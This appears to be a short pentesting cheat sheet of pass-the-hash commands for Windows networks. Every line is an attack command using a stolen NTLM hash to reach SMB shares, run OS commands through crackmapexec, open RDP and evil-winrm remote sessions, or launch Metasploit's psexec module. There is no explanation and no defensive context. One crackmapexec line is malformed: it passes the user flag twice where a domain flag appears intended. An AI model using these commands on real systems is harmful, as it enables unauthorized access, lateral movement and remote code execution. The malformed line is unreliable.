smbclient //IP/Share -U <User> --pw-nt-hash HASH -W Domain
crackmapexec smb <IP> -u <User> -H <NTLM>
crackmapexec smb <IP> -d 'SUB.DOMAIN.ORG' -u 'user' -H NTLMHASH
crackmapexec smb <IP> -u 'SUB.DOMAIN.ORG' -u 'user' -H NTLMHASH -x 'OScmd'
xfreerdp /v:10.10.10.100 /u:user /pth:hash
evil-winrm -i <IP> -u <User> -H <NThash>
use exploit/windows/smb/psexec
set smbpass "aad3b435:hash"